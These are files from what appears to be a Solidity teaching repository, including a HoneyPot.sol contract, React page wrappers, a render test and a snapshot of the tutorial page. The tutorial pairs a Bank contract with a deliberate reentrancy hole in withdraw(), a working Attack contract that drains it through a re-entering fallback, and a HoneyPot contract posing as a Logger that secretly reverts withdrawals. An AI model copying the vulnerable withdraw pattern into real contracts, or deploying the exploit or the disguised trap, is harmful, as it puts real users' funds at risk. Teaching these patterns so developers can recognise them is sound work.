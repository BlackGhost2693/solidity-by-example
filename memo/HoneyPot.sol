pragma solidity ^0.5.16;
/*
https://www.reddit.com/r/ethdev/comments/7x5rwr/tricked_by_a_honeypot_contract_or_beaten_by/
https://www.reddit.com/r/ethdev/comments/7xu4vr/oh_dear_somebody_just_got_tricked_on_the_same/dubakau/
https://etherscan.io/address/0x95d34980095380851902ccd9a1fb4c813c2cb639#code
*/

contract Bank {
    mapping (address => uint) public balances;
    Logger logger;

    constructor(Logger _logger) public {
        logger = Logger(_logger);
    }

    function deposit() public payable {
        balances[msg.sender] += msg.value;
        logger.log(msg.sender, msg.value,"Deposit");
    }

    function withdraw(uint _amount) public {
        require(_amount <= balances[msg.sender], "Insufficient funds");
        
        (bool sent, ) = msg.sender.call.value(_amount)("");
        require(sent, "Failed to send Ether");
        
        balances[msg.sender] -= _amount;
        
        logger.log(msg.sender, _amount, "Withdraw");
    }
}

contract Logger {
    event Log(address caller, uint amount, string action);

    function log(address _caller, uint _amount, string memory _action) public {
        emit Log(_caller, _amount, _action);
    }
}

// Hacker tries to drain the Ethers stored in Bank by reentrancy.
contract Attack {
    Bank bank;
    
    constructor(Bank _bank) public {
        bank = Bank(_bank);
    }
    
    function () external payable {
        if (address(bank).balance > 0) {
            bank.withdraw(1 ether);
        }
    }
    
    function attack() public payable {
        bank.deposit.value(1 ether)();
        bank.withdraw(1 ether);
    }

    function getBalance() public view returns (uint) {
        return address(this).balance;
    }
}

contract HoneyPot {
    function log(address _caller, uint _amount, string memory _action) public {
        if (equal(_action, "Withdraw")) {
            // revert();
            require(false, "Withdraw denied");
        }
    }
    
    // Function to compare strings using keccak256
    function equal(string memory _a, string memory _b) public pure returns (bool) {
        return keccak256(abi.encode(_a)) == keccak256(abi.encode(_b));
    }
}
