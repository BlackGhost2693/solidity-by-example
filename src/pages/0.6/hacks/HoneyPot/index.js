import React from "react"
import Example from "../../../../components/Example"
import html from "./index.html.js"
import { SOL_VERSION } from "../../constants"

export default function (props) {
  return (
    <Example
      title="Honeypot"
      version={SOL_VERSION}
      description="An example of honeypot in Solidity"
      html={html}
    />
  )
}
