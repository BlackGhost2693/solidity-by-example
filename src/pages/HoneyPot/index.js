import React from "react"
import Example from "../../components/Example"
import html from "./index.html.js"

export default function (props) {
  return (
    <Example
      title="Honeypot"
      description="An example of honeypot in Solidity"
      html={html}
    />
  )
}
