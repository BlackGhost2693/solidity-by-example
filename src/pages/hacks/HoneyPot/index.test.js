import { shallow } from "enzyme"
import React from "react"
import HoneyPot from "./index"

test("it renders", () => {
  const component = shallow(<HoneyPot />)

  expect(component).toMatchSnapshot()
})
