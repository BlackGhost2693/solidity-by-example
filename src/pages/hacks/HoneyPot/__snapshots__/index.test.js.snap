// Jest Snapshot v1, https://goo.gl/fbAQLP

exports[`it renders 1`] = `
<Example
  description="An example of honeypot in Solidity"
  html="<p>A honeypot is a trap to catch hackers.</p>
<h3 id=\\"vulnerability\\">Vulnerability</h3>
<p>Combining two exploits, reentrancy and hiding malicious code, we can build a contract</p>
<p>that will catch malicious users.</p>
<pre><code class=\\"language-solidity\\">pragma solidity ^0.5.16;

/*
Bank is a contract that calls Logger to log events.
Bank.withdraw() is vulnerable to the reentrancy attack.
So a hacker tries to drain Ether from Bank.
But actually the reentracy exploit is a bait for hackers.
By deploying Bank with HoneyPot in place of the Logger, this contract becomes
a trap for hackers. Let&#39;s see how.

1. Alice deploys HoneyPot
2. Alice deploys Bank with the address of HoneyPot
3. Alice deposits 1 Ether into Bank.
4. Eve discovers the reentrancy exploit in Bank.withdraw and decides to hack it.
5. Eve deploys Attack with the address of Bank
6. Eve calls Attack.attack() with 1 Ether but the transaction fails.

What happened?
Eve calls Attack.attack() and it starts withdrawing Ether from Bank.
When the last Bank.withdraw() is about to complete, it calls logger.log().
Logger.log() calls HoneyPot.log() and reverts. Transaction fails.
*/

contract Bank {
    mapping (address =&gt; uint) public balances;
    Logger logger;

    constructor(Logger _logger) public {
        logger = Logger(_logger);
    }

    function deposit() public payable {
        balances[msg.sender] += msg.value;
        logger.log(msg.sender, msg.value,\\"Deposit\\");
    }

    function withdraw(uint _amount) public {
        require(_amount &lt;= balances[msg.sender], \\"Insufficient funds\\");

        (bool sent, ) = msg.sender.call.value(_amount)(\\"\\");
        require(sent, \\"Failed to send Ether\\");

        balances[msg.sender] -= _amount;

        logger.log(msg.sender, _amount, \\"Withdraw\\");
    }
}

contract Logger {
    event Log(address caller, uint amount, string action);

    function log(address _caller, uint _amount, string memory _action) public {
        emit Log(_caller, _amount, _action);
    }
}

// Hacker tries to drain the Ethers stored in Bank by reentrancy.
contract Attack {
    Bank bank;

    constructor(Bank _bank) public {
        bank = Bank(_bank);
    }

    function () external payable {
        if (address(bank).balance &gt;= 1 ether) {
            bank.withdraw(1 ether);
        }
    }

    function attack() public payable {
        bank.deposit.value(1 ether)();
        bank.withdraw(1 ether);
    }

    function getBalance() public view returns (uint) {
        return address(this).balance;
    }
}

// Let&#39;s say this code is in a separate file so that others cannot read it.
contract HoneyPot {
    function log(address _caller, uint _amount, string memory _action)
        public
    {
        if (equal(_action, \\"Withdraw\\")) {
            revert(\\"It&#39;s a trap\\");
        }
    }

    // Function to compare strings using keccak256
    function equal(string memory _a, string memory _b)
        public pure returns (bool)
    {
        return keccak256(abi.encode(_a)) == keccak256(abi.encode(_b));
    }
}
</code></pre>
"
  title="Honeypot"
/>
`;
